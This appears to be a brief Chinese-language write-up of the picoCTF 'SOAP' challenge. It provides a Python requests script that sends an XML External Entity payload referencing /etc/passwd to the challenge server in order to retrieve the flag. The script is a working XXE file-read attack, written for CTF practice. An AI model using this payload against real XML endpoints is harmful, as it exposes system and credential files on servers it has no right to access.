肥皂
100点
作者:Geoffrey Njogu
描述
网络项目匆匆忙忙,没有进行安全评估。您可以阅读 /etc /passwd文件吗?
启动挑战实例后,将提供其他详细信息。
使用此Python脚本,您可以通过使用Python发送请求来获得标志
import requests
headers = {
'Host': 'saturn.picoctf.net:port',
# 'Content-Length': '126',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36',
'Content-Type': 'application/xml',
'Accept': '/',
'Origin': 'http://saturn.picoctf.net:port/',
'Referer': 'http://saturn.picoctf.net:port/',
# 'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-GB,en-US;q=0.9,en;q=0.8',
'Connection': 'close',
}
data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]><data><ID>&example;1</ID></data>'
response = requests.post('http://saturn.picoctf.net:port/data', headers=headers, data=data, verify=False)
print(response)
,我们可以在repsonse中看到标志:
picoctf {您的标志}